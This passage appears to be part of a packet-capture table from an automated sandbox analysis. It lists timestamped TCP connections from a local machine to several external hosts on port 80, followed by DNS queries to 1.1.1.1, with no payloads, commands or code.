Jun 5, 2024 18:29:24.985723972 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:24.987701893 CEST	49743	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:24.987701893 CEST	49743	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:24.992593050 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861164093 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861207962 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861249924 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861267090 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861306906 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861323118 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.861335039 CEST	49743	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:25.861444950 CEST	49743	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:25.998461962 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:25.998605967 CEST	49743	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:25.999722004 CEST	49743	80	192.168.2.7	194.9.94.86
Jun 5, 2024 18:29:26.004543066 CEST	80	49743	194.9.94.86	192.168.2.7
Jun 5, 2024 18:29:31.029835939 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.034775972 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.034967899 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.037743092 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.042613029 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862610102 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862623930 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862629890 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862679005 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862683058 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.862687111 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862728119 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.862804890 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862812042 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862819910 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.862848997 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.862863064 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.862996101 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.863003969 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.863043070 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.867686033 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.867714882 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.867752075 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:31.981945038 CEST	80	49744	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:31.982007980 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:32.540071964 CEST	49744	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:33.560796976 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:33.565874100 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:33.568909883 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:33.573555946 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:33.578445911 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.400929928 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.400949001 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.400973082 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.400985003 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401006937 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401030064 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.401066065 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401076078 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.401087046 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401106119 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.401149988 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401160002 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401184082 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.401220083 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.401257038 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.406172991 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.406198978 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.406243086 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.406255007 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.406567097 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.406605005 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:34.520781994 CEST	80	49745	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:34.520837069 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:35.087018013 CEST	49745	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.107157946 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.112143993 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.112248898 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.115288019 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.120234013 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.120820999 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950640917 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950654984 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950803041 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950815916 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950835943 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.950959921 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950964928 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.950973034 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950985909 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.950997114 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.951051950 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.951051950 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.951143980 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.951158047 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.953860998 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:36.958611012 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.958623886 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.958638906 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.958651066 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:36.958928108 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:37.068190098 CEST	80	49746	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:37.068742037 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:37.618180037 CEST	49746	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:38.647593021 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:38.653549910 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:38.653636932 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:38.655515909 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:38.660958052 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487042904 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487085104 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487119913 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487289906 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487288952 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.487309933 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487325907 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487358093 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.487421989 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487441063 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487453938 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.487454891 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487492085 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.487591982 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.489114046 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.492165089 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.492217064 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.492229939 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.492294073 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.492460966 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.492505074 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.608133078 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608166933 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608180046 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608248949 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608318090 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.608392954 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608455896 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608467102 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608489990 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.608555079 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.608611107 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608617067 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608628988 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.608692884 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.609338999 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609359026 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609447002 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.609513998 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609627008 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609635115 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609702110 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609708071 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609719992 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.609772921 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.609772921 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.610474110 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.610527039 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.610532999 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.610562086 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.610682011 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.610687971 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.610693932 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.610754013 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.610754013 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.613185883 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.680767059 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.729336977 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729346991 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729477882 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729482889 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729482889 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.729516029 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729589939 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729594946 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729597092 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.729670048 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729672909 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.729676008 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729806900 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.729815960 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729821920 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.729885101 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.730067015 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730073929 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730186939 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.730186939 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730195999 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730262995 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.730282068 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730386972 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.730566978 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730632067 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730673075 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730700016 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.730856895 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.730918884 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731008053 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731009007 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.731014013 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731148958 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731153965 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731167078 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731228113 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.731228113 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.731323004 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731781006 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731817007 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731829882 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731905937 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.731949091 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731955051 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.731966019 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.732054949 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.732131958 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.732189894 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.732340097 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.732629061 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.732693911 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.732842922 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.850627899 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:39.850742102 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.851957083 CEST	49747	80	192.168.2.7	35.214.235.206
Jun 5, 2024 18:29:39.856803894 CEST	80	49747	35.214.235.206	192.168.2.7
Jun 5, 2024 18:29:53.506499052 CEST	49748	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:53.511451960 CEST	80	49748	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:53.511614084 CEST	49748	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:53.513837099 CEST	49748	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:53.518686056 CEST	80	49748	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:54.513753891 CEST	80	49748	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:54.696446896 CEST	49748	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:54.720184088 CEST	80	49748	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:54.720379114 CEST	49748	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:55.024594069 CEST	49748	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:56.044164896 CEST	49749	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:56.049336910 CEST	80	49749	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:56.049447060 CEST	49749	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:56.051960945 CEST	49749	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:56.056915045 CEST	80	49749	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:57.068013906 CEST	80	49749	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:57.196399927 CEST	49749	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:57.282042027 CEST	80	49749	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:57.282505989 CEST	49749	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:57.557404995 CEST	49749	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:58.576231003 CEST	49750	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:58.581310034 CEST	80	49750	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:58.581406116 CEST	49750	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:58.585136890 CEST	49750	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:58.590137005 CEST	80	49750	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:58.590197086 CEST	80	49750	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:59.592618942 CEST	80	49750	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:59.774777889 CEST	49750	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:29:59.803416014 CEST	80	49750	18.178.206.118	192.168.2.7
Jun 5, 2024 18:29:59.803700924 CEST	49750	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:00.103167057 CEST	49750	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:01.122574091 CEST	49751	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:01.127568960 CEST	80	49751	18.178.206.118	192.168.2.7
Jun 5, 2024 18:30:01.131356001 CEST	49751	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:01.133013010 CEST	49751	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:01.138464928 CEST	80	49751	18.178.206.118	192.168.2.7
Jun 5, 2024 18:30:02.148477077 CEST	80	49751	18.178.206.118	192.168.2.7
Jun 5, 2024 18:30:02.303307056 CEST	49751	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:02.362507105 CEST	80	49751	18.178.206.118	192.168.2.7
Jun 5, 2024 18:30:02.362629890 CEST	49751	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:02.363806963 CEST	49751	80	192.168.2.7	18.178.206.118
Jun 5, 2024 18:30:02.368696928 CEST	80	49751	18.178.206.118	192.168.2.7
Jun 5, 2024 18:30:07.687005997 CEST	49752	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:07.692102909 CEST	80	49752	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:07.694304943 CEST	49752	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:07.697262049 CEST	49752	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:07.702315092 CEST	80	49752	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:08.381361961 CEST	80	49752	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:08.423397064 CEST	80	49752	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:08.423450947 CEST	49752	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:09.214747906 CEST	49752	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:10.231590033 CEST	49753	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:10.236506939 CEST	80	49753	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:10.236573935 CEST	49753	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:10.239268064 CEST	49753	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:10.244147062 CEST	80	49753	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:10.922113895 CEST	80	49753	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:10.964116096 CEST	80	49753	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:10.971328974 CEST	49753	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:11.743807077 CEST	49753	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:12.763403893 CEST	49754	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:12.769134998 CEST	80	49754	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:12.769826889 CEST	49754	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:12.771497965 CEST	49754	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:12.776386976 CEST	80	49754	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:12.777209044 CEST	80	49754	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:13.450958014 CEST	80	49754	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:13.493089914 CEST	80	49754	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:13.498418093 CEST	49754	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:14.274758101 CEST	49754	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:16.918276072 CEST	49755	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:16.923410892 CEST	80	49755	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:16.923981905 CEST	49755	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:16.925648928 CEST	49755	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:16.930561066 CEST	80	49755	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:19.611146927 CEST	80	49755	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:19.655536890 CEST	80	49755	66.96.162.149	192.168.2.7
Jun 5, 2024 18:30:19.655803919 CEST	49755	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:19.656680107 CEST	49755	80	192.168.2.7	66.96.162.149
Jun 5, 2024 18:30:19.664767027 CEST	80	49755	66.96.162.149	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 5, 2024 18:26:54.331760883 CEST	54086	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:26:54.689910889 CEST	53	54086	1.1.1.1	192.168.2.7
Jun 5, 2024 18:26:59.699733973 CEST	56990	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:26:59.761246920 CEST	53	56990	1.1.1.1	192.168.2.7
Jun 5, 2024 18:27:15.496084929 CEST	64665	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:27:16.492803097 CEST	64665	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:27:16.671544075 CEST	53	64665	1.1.1.1	192.168.2.7
Jun 5, 2024 18:27:16.685754061 CEST	53	64665	1.1.1.1	192.168.2.7
Jun 5, 2024 18:27:29.949387074 CEST	57530	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:27:30.259701967 CEST	53	57530	1.1.1.1	192.168.2.7
Jun 5, 2024 18:27:43.981256962 CEST	51205	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:27:44.240690947 CEST	53	51205	1.1.1.1	192.168.2.7
Jun 5, 2024 18:27:58.496612072 CEST	49528	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:27:59.496294975 CEST	49528	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:27:59.664191008 CEST	53	49528	1.1.1.1	192.168.2.7
Jun 5, 2024 18:27:59.664319992 CEST	53	49528	1.1.1.1	192.168.2.7
Jun 5, 2024 18:28:13.778332949 CEST	56492	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:28:13.790096998 CEST	53	56492	1.1.1.1	192.168.2.7
Jun 5, 2024 18:28:21.859253883 CEST	59608	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:28:21.900665045 CEST	53	59608	1.1.1.1	192.168.2.7
Jun 5, 2024 18:28:41.488004923 CEST	59723	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:28:41.887233973 CEST	53	59723	1.1.1.1	192.168.2.7
Jun 5, 2024 18:28:55.246263027 CEST	64654	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:28:55.758563042 CEST	53	64654	1.1.1.1	192.168.2.7
Jun 5, 2024 18:29:09.199626923 CEST	60056	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:29:09.220150948 CEST	53	60056	1.1.1.1	192.168.2.7
Jun 5, 2024 18:29:17.297926903 CEST	50023	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:29:17.370260000 CEST	53	50023	1.1.1.1	192.168.2.7
Jun 5, 2024 18:29:31.012716055 CEST	50651	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:29:31.027184963 CEST	53	50651	1.1.1.1	192.168.2.7
Jun 5, 2024 18:29:44.858705997 CEST	52108	53	192.168.2.7	1.1.1.1
Jun 5, 2024 18:29:44.868803978 CEST	53	52108	1.1.1.1	192.168.2.7
Jun 5, 2024 18:29:52.950803995 CEST	62349	53	192.168.2.7	1.1.1.1
